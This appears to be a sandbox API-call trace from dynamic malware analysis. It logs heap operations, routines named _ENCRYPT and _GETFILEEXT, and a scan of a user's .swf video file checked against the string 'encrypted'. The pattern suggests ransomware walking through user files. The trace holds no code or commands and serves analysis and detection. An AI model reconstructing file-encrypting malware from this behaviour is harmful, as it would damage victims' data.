1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.642] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.642] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.643] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.644] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0043.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.644] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.644] CloseHandle (hObject=0x140) returned 1 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.645] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.645] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.645] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.645] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.645] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.645] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.645] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.646] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.646] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.646] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf402ab30, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0xc154a40, ftLastAccessTime.dwHighDateTime=0x1d5ba8b, ftLastWriteTime.dwLowDateTime=0xc154a40, ftLastWriteTime.dwHighDateTime=0x1d5ba8b, nFileSizeHigh=0x0, nFileSizeLow=0x1667d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Ou4nOp2hd11P9km.swf", cAlternateFileName="OU4NOP~1.SWF")) returned 0x7c20c0 [0043.646] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.646] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf402ab30, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0xc154a40, ftLastAccessTime.dwHighDateTime=0x1d5ba8b, ftLastWriteTime.dwLowDateTime=0xc154a40, ftLastWriteTime.dwHighDateTime=0x1d5ba8b, nFileSizeHigh=0x0, nFileSizeLow=0x1667d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Ou4nOp2hd11P9km.swf", cAlternateFileName="OU4NOP~1.SWF")) returned 0x7c20c0 [0043.646] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.646] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 